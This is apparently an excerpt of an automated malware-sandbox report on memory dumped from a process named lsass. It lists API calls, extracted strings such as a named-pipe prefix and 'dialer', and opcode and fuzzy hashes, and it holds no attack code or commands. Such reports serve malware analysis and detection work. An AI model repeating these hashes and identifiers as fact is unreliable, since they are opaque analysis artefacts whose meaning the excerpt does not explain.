140adfc90e4 611->615 616 140adfc9cba-140adfc9cc2 611->616 615->616 629 140adfc9cdb-140adfc9ce3 615->629 616->600 621 140adfc9cc8-140adfc9cd5 call 140adfc8cb4 616->621 652 140adfc9a48-140adfc9a52 call 140adfc8a34 618->652 653 140adfc9a2a-140adfc9a2e 618->653 621->600 621->629 626 140adfc9b19-140adfc9b4b 622->626 631 140adfc9c87-140adfc9c8e 626->631 632 140adfc9b51-140adfc9b5c 626->632 633 140adfc9ce9-140adfc9ced 629->633 634 140adfc9df6-140adfc9e12 call 140adfc8a34 * 2 call 140adfcbaa8 629->634 631->607 631->626 632->631 635 140adfc9b62-140adfc9b7b 632->635 637 140adfc9cef-140adfc9cfe call 140adfc90e4 633->637 638 140adfc9d00 633->638 634->588 639 140adfc9c74-140adfc9c79 635->639 640 140adfc9b81-140adfc9bc6 call 140adfc90f8 * 2 635->640 648 140adfc9d03-140adfc9d0d call 140adfca8ac 637->648 638->648 644 140adfc9c84 639->644 665 140adfc9bc8-140adfc9bee call 140adfc90f8 call 140adfca038 640->665 666 140adfc9c04-140adfc9c0a 640->666 644->631 648->600 663 140adfc9d13-140adfc9d61 call 140adfc8d44 call 140adfc8f50 648->663 652->592 669 140adfc9a54-140adfc9a74 call 140adfc8a34 * 2 call 140adfca8ac 652->669 653->652 657 140adfc9a30-140adfc9a3b 653->657 657->652 662 140adfc9a3d-140adfc9a42 657->662 662->588 662->652 663->600 684 140adfc9c15-140adfc9c72 call 140adfc9870 665->684 685 140adfc9bf0-140adfc9c02 665->685 673 140adfc9c0c-140adfc9c10 666->673 674 140adfc9c7b 666->674 690 140adfc9a8b 669->690 691 140adfc9a76-140adfc9a80 call 140adfca99c 669->691 673->640 675 140adfc9c80 674->675 675->644 684->675 685->665 685->666 690->592 694 140adfc9a86-140adfc9def call 140adfc86ac call 140adfca3f4 call 140adfc88a0 691->694 695 140adfc9df0-140adfc9df5 call 140adfcbaa8 691->695 694->695 695->634
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3352596228.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140adfc0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 849930591-393685449
                                                  • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                  • Instruction ID: 610288a21bba7234f961b83c38f566fdeb512e40ac2c0f228fa86b943482e177
                                                  • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                  • Instruction Fuzzy Hash: 21E1AE726247488BEB62DB26D4803DE37B3FB49B89F200115EF8957BA5DB34C1A2D700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeLibraryProc
                                                  • String ID: api-ms-$ext-ms-
                                                  • API String ID: 3013587201-537541572
                                                  • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                  • Instruction ID: 54f3c5caea9a3c542447f16078fc342d6fc1075fabbd0ba72b9af9b604dcfd33
                                                  • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                  • Instruction Fuzzy Hash: 0A41AE32391B0082EB27CF17A9047D56391BB4DBB0F7945259E0E97BA4EE38CC45D392
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                  • String ID: d
                                                  • API String ID: 3743429067-2564639436
                                                  • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                  • Instruction ID: f351be34048a7ac2b0398fd5e5befab81f97ba1f80314118af7c8759807b7470
                                                  • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                  • Instruction Fuzzy Hash: 54415B32614B84C6E761CF22E44439A77B1F389BA8F248129DF8D07B68DF38C849CB41
                                                  APIs
                                                  • FlsGetValue.KERNEL32(?,?,?,00000140AE86C7DE,?,?,?,?,?,?,?,?,00000140AE86CF9D,?,?,00000001), ref: 00000140AE86D087
                                                  • FlsSetValue.KERNEL32(?,?,?,00000140AE86C7DE,?,?,?,?,?,?,?,?,00000140AE86CF9D,?,?,00000001), ref: 00000140AE86D0A6
                                                  • FlsSetValue.KERNEL32(?,?,?,00000140AE86C7DE,?,?,?,?,?,?,?,?,00000140AE86CF9D,?,?,00000001), ref: 00000140AE86D0CE
                                                  • FlsSetValue.KERNEL32(?,?,?,00000140AE86C7DE,?,?,?,?,?,?,?,?,00000140AE86CF9D,?,?,00000001), ref: 00000140AE86D0DF
                                                  • FlsSetValue.KERNEL32(?,?,?,00000140AE86C7DE,?,?,?,?,?,?,?,?,00000140AE86CF9D,?,?,00000001), ref: 00000140AE86D0F0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Value
                                                  • String ID: 1%$Y%
                                                  • API String ID: 3702945584-1395475152
                                                  • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                  • Instruction ID: 5fd4451407afae9fb266b5747a94aa354b26cb0abe68d3eef0f402a98e977e8e
                                                  • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                  • Instruction Fuzzy Hash: D1114C3068434441FA6AAB275A513E962516B5C7F0F785B24AE3D076FEDE78DC02C683
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                  • String ID:
                                                  • API String ID: 190073905-0
                                                  • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                  • Instruction ID: 65cc65eb12478eed7e59dbe5af20ea895e9a9811b6e8982f7201964f625eb0cd
                                                  • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                  • Instruction Fuzzy Hash: F2819F30A9034187FB53AB6798413D92292AB8D7B4F744525AF0C477B6EB3ACC45C7C2
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                  • String ID: api-ms-
                                                  • API String ID: 2559590344-2084034818
                                                  • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                  • Instruction ID: 03dcf4635245ae701bcfc235362316d2ff68836874f11cf0347ec2092aff8e99
                                                  • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                  • Instruction Fuzzy Hash: 9F319031292B40E1EF239B47A4007D56394B74CBB0F7985259E2E4B7A0EF7DC845C392
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                  • String ID: CONOUT$
                                                  • API String ID: 3230265001-3130406586
                                                  • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                  • Instruction ID: ad989254367ffea67bb77bf17bba7392694ea205673c5da45a75a0c92e4d569a
                                                  • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                  • Instruction Fuzzy Hash: 82114932650B4086E7528B53A84439977A4B79CFF4F644224EF5E87BA5CF38C814C782
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModule
                                                  • String ID: wr
                                                  • API String ID: 1092925422-2678910430
                                                  • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                  • Instruction ID: fd890a10e18ff91e2345af510b04503e6d001258bbebb589a967ba1f92d71b91
                                                  • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                  • Instruction Fuzzy Hash: 81113936B45B8182FF159B23E4082A972A0FB8CBA5F640029DF9D077A4EF3DC905C745
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Thread$Current$Context
                                                  • String ID:
                                                  • API String ID: 1666949209-0
                                                  • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                  • Instruction ID: 4b8643210702c91202cb0783c5a391a2a26d50b369a2e2f855514301358eef3e
                                                  • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                  • Instruction Fuzzy Hash: 98D19736248B8882DA719B0AE49439A77A0F78CB94F600516EF8D47BB5DF3CC941CB81
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID: dialer
                                                  • API String ID: 756756679-3528709123
                                                  • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                  • Instruction ID: a2d052cb6962f498e3cef9ed57c0a8daa6a62b61da821da8834fd8d960af75c0
                                                  • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                  • Instruction Fuzzy Hash: D231B332741B5182EB26DF1BE5447A9A7A0FB4DBA4F2881209F4C47B75EF34C8A5C781
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Value$ErrorLast
                                                  • String ID:
                                                  • API String ID: 2506987500-0
                                                  • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                  • Instruction ID: b1e378f208745640ce80b78c559ffaa0a20b0e3a8eff5e4311b7b060cf634d78
                                                  • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                  • Instruction Fuzzy Hash: F3112E3028534081FA66AB635A553A962416B9C7F4F344B24EE3E476FADE78DC01D6C3
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID:
                                                  • API String ID: 517849248-0
                                                  • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                  • Instruction ID: 9022e9ca5b0b5f71c7b82a84b25e46de0569a46428ab685b711a92cff19137a4
                                                  • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                  • Instruction Fuzzy Hash: A5015731740B4082EB51DB53A848799A3A1F78CBD1FA84035DF4D43B65DE38C989C781
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                  • String ID:
                                                  • API String ID: 449555515-0
                                                  • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                  • Instruction ID: 301de5e6a3bc59086d6f9150b82df67b6d6c22bbab0207dc7c03168e1951e1a1
                                                  • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                  • Instruction Fuzzy Hash: 01015774651B40C2EB269B23E81879973A0BB9DBA2F240428CF4D07774EF3CC908C782
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                  • String ID: csm$f
                                                  • API String ID: 2395640692-629598281
                                                  • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                  • Instruction ID: bd338bf40550659d0ab490f789d63c081b601061abea68a920c6aca0165ba548
                                                  • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                  • Instruction Fuzzy Hash: 8351A13265170086EB16CB16E848B9937A6F348BA8F318524DF1A477E8DB3DCC41C782
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd
                                                  Similarity
                                                  • API ID: CombinePath
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3422762182-91387939
                                                  • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                  • Instruction ID: 0e89825c8f5d70b27a483a01b8d98a85527b4973c2a0efa788cb30948269fb2a
                                                  • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                  • Instruction Fuzzy Hash: A6F05E30644B8082EB058B53B9041996261AB8CFE0F245020EF4E07B78DE38C849C782
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                  • Instruction ID: 0a5f03d881548423950f550b58b8fc74d35f60bbb561fa5f685fc2d061d5bb49
                                                  • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                  • Instruction Fuzzy Hash: 7EF06D71655B0582EB128B26E8443A97320EB8CBB5F740219CF6E472F4CF3DC948D381
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                  • Instruction ID: 73fda85837acdd30ad006dc6ccb1667200e15de9212539d4e27f8f5c03466d3a
                                                  • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                  • Instruction Fuzzy Hash: 2702FA32259B8486EB61DB56F49439AB7A1F7C8794F200415EB8E87BB8DF7CC844CB41
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                  • Instruction ID: 819f4eb226d638b22eb9453569fbd0dff2ed878ae5cb7d9cc285f1354ad887c7
                                                  • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                  • Instruction Fuzzy Hash: 9B61C536559B44C6E7629B16F48439AB7A0F7887A4F600515EF8E47BB8DF7CC840CB82
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd
                                                  Similarity
                                                  • API ID: _set_statfp
                                                  • String ID:
                                                  • API String ID: 1156100317-0
                                                  • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                  • Instruction ID: 28d524a13795f3523b3f1b4b207150eb2f338f5cab7179f9a4c1ef00b7941454
                                                  • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                  • Instruction Fuzzy Hash: DC119132AD0B5011F667256AD4913E531446B6DBB8F390624AF7E176F68B34CC41C2A2
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3352596228.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140adfc0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: _set_statfp
                                                  • String ID:
                                                  • API String ID: 1156100317-0
                                                  • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                  • Instruction ID: 2e1910b8291bafd17102f3214c72d3e729590e13e78c3872cab4fc5f060f1e3e
                                                  • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                  • Instruction Fuzzy Hash: 22115472614B5353FA56162AE4553EB31C36F5C37CF784628AFE6076F68A34E8436200
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3352596228.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140adfc0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                  • API String ID: 3215553584-4202648911
                                                  • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                  • Instruction ID: 48ac8b7a938d00f4a24374fee49c64dd94bfb0dfea2bd827f35d3ab40a9a7452
                                                  • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                  • Instruction Fuzzy Hash: 3961B43652234853FA6B8B67E5443EBBAA3EF8D748F744415CB46077B4DB34C967A200
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd
                                                  Similarity
                                                  • API ID: CallEncodePointerTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3544855599-2084237596
                                                  • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                  • Instruction ID: 1c54ac8669fca167ed3fb4a5461af2b1e7039b1515757cf07daf6e620200d245
                                                  • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                  • Instruction Fuzzy Hash: B6619F33640B848AEB11DF66D4403DD77A0F748BA8F244256EF4E17BA9DB38C995C781
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 3896166516-3733052814
                                                  • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                  • Instruction ID: 6cac39d5d8876cbc65fde025732dcd94be71c236f1742025846821184820e854
                                                  • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                  • Instruction Fuzzy Hash: D951AF72180780CAEB768F17958439977A0F358BA8F244256DF9D47BE5CB38D890D782
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3352596228.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140adfc0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 3896166516-3733052814
                                                  • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                  • Instruction ID: 5e9ed10956360af88f8a3a4b9cf73a15bede84b98f5d365089c0e3503e132e06
                                                  • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                  • Instruction Fuzzy Hash: B751E432120388CBEB658B6794443DA37A3FB58B84F244117DB4947BE5CB39E5A2E700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3352596228.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140adfc0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                                  • String ID: csm$f
                                                  • API String ID: 3242871069-629598281
                                                  • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                  • Instruction ID: 595c9e32b9df4e514150441d0aa3e925450171a8e5ef433ea7709e32150aded9
                                                  • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                  • Instruction Fuzzy Hash: E551E43272170487DB96CF16D404BEA3797FB48BA8F318424DB06437A8EBB4C952A704
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3352596228.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140adfc0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                                  • String ID: csm$f
                                                  • API String ID: 3242871069-629598281
                                                  • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                  • Instruction ID: fdcdef5ba31d8dbb8912a9a905e6b67567b4155f9952f6a6302e3e1a43461dee
                                                  • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                  • Instruction Fuzzy Hash: 4831CF3122174487E792DF13E844BDA37A7FB48B98F258414EF8A037A8CB38C952D704
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd
                                                  Similarity
                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                  • String ID:
                                                  • API String ID: 2718003287-0
                                                  • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                  • Instruction ID: 4b0a4d86e2932106c0371b6ae4a27eadaf1a36e0bf94906de29ca74a04e3cc8d
                                                  • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                  • Instruction Fuzzy Hash: 44D1D072B54B8089E712CFAAD5403EC3BB1F3587A8F244216CF5D97BA9DA34C946C381
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Free
                                                  • String ID:
                                                  • API String ID: 3168794593-0
                                                  • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                  • Instruction ID: e0938be913c4546f92e354b3f490316f5aad01bc8c73eed3b2a93003b4ccae50
                                                  • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                  • Instruction Fuzzy Hash: 4C015A32A40B90C6E706DF67E94828A77A1F78DFA1F244425EF4E4372ADE38C851C791
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd
                                                  Similarity
                                                  • API ID: ConsoleErrorLastMode
                                                  • String ID:
                                                  • API String ID: 953036326-0
                                                  • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                  • Instruction ID: bfe30e0d5e1943aced18828ddcaefd42f41aed77c308e3009ff5d43c7c6b682c
                                                  • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                  • Instruction Fuzzy Hash: A491AFB264075085F762DF6A94803ED3BA4F758BA8F744109DF4E67AA5DB34CC82C782
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
